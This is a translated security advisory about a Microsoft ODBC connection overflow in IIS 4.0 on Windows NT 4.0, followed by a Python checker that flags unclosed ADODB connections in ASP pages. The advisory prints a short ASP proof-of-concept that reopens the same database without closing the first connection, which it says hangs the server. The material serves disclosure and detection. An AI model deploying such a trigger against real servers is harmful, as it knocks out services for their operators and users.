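18. MS ODBC database connection overflow causes denial of service on NT/9x
Vulnerability description: Microsoft ODBC may have a potential overflow problem when connecting to and disconnecting from a database (related to Microsoft Access databases). If a connection to a second database is made directly without first closing the existing connection, the service may stop.
Affected systems:
ODBC version: 3.510.3711.0
ODBC Access driver version: 3.51.1029.00
OS version: Windows NT 4.0 Service Pack 5, IIS 4.0 (i386)
Microsoft Office 97 Professional (MSO97.dll: 8.0.0.3507)
The vulnerability can be checked as follows:
ODBC data source name: miscdb
ODBC database type: MS Access
ODBC assumed path: d:\data\misc.mdb
The ASP code is as follows: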
<%
set connVB = server.createobject("ADODB.Connection")
connVB.open "DRIVER={Microsoft Access Driver (*.mdb)}; DSN=miscdb"
%>
<html>
<body>
...lots of html removed...
<!-- We Connect to DB1 -->
<%
set connGlobal = server.createobject("ADODB.Connection")
connGlobal.Open "DSN=miscdb;User=sa"
mSQL = "arb SQL Statement"
set rsGlobal = connGlobal.execute(mSQL)
While not rsGlobal.eof
    Response.Write rsGlobal("resultfrommiscdb")
    rsGlobal.movenext
wend
'rsGlobal.close
'set rsGlobal = nothing
'connGlobal.close
'set connGlobal = nothing
' Note we do NOT close the connection
%>
<!-- Call the same database by means of DBQ direct file access -->
<%
set connGlobal = server.createobject("ADODB.Connection")
connGlobal.Open "DRIVER={Microsoft Access Driver (*.mdb)}; DBQ=d:\data\misc.mdb"
mSQL = "arb SQL Statement"
set rsGlobal = connGlobal.execute(mSQL)
While not rsGlobal.eof
    Response.Write rsGlobal("resultfrommiscdb")
    rsGlobal.movenext
wend
rsGlobal.close
set rsGlobal = nothing
connGlobal.close
set connGlobal = nothing
' Note we DO close the connection
%>
In this case, IIS request processing stalls and CPU usage reaches 100% because of the inetinfo.exe process. Only restarting the computer restores service. (Source: 熱點網絡)
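A heuristic static check for the pattern described above, as an added example that is not part of the original advisory: it scans classic ASP source for an ADODB.Connection `Open` issued while an earlier connection is still open. The function name, the one-statement-per-line assumption and the sample page (constructed from the advisory's snippet) are assumptions.

```python
import re

# Constructed sample, modelled on the advisory's ASP page (one statement per line).
SAMPLE_ASP = r'''<%
set connGlobal = server.createobject("ADODB.Connection")
connGlobal.Open "DSN=miscdb;User=sa"
set rsGlobal = connGlobal.execute(mSQL)
'connGlobal.close
%>
<%
set connGlobal = server.createobject("ADODB.Connection")
connGlobal.Open "DRIVER={Microsoft Access Driver (*.mdb)}; DBQ=d:\data\misc.mdb"
connGlobal.close
set connGlobal = nothing
%>'''

CREATE_RE = re.compile(
    r'set\s+(\w+)\s*=\s*server\.createobject\(\s*"ADODB\.Connection"\s*\)', re.I)
OPEN_RE = re.compile(r'(\w+)\.open\b', re.I)
CLOSE_RE = re.compile(r'(\w+)\.close\b', re.I)

def find_overlapping_opens(asp_source):
    """Hypothetical helper: return (findings, leaked).

    findings: (line, variable, line_of_earlier_open) for each Open issued
              while an earlier ADODB connection has not been closed.
    leaked:   line numbers of Opens never closed by the end of the page.
    """
    conn_vars, still_open, findings = set(), [], []
    for no, raw in enumerate(asp_source.splitlines(), 1):
        line = raw.replace("<%", "").replace("%>", "").strip()
        if not line or line.startswith("'"):
            continue  # blank, or a VBScript comment such as a commented-out close
        if m := CREATE_RE.match(line):
            conn_vars.add(m.group(1).lower())
        elif (m := OPEN_RE.match(line)) and m.group(1).lower() in conn_vars:
            if still_open:
                findings.append((no, m.group(1), still_open[0][1]))
            still_open.append((m.group(1).lower(), no))
        elif m := CLOSE_RE.match(line):
            var = m.group(1).lower()
            # Close the most recent open made through this variable name.
            for i in range(len(still_open) - 1, -1, -1):
                if still_open[i][0] == var:
                    del still_open[i]
                    break
    return findings, [ln for _, ln in still_open]

if __name__ == "__main__":
    print(find_overlapping_opens(SAMPLE_ASP))
```

The check is line-based, so it does not follow colon-separated statements or server-side includes; treat a clean result as a prompt for manual review, not as proof.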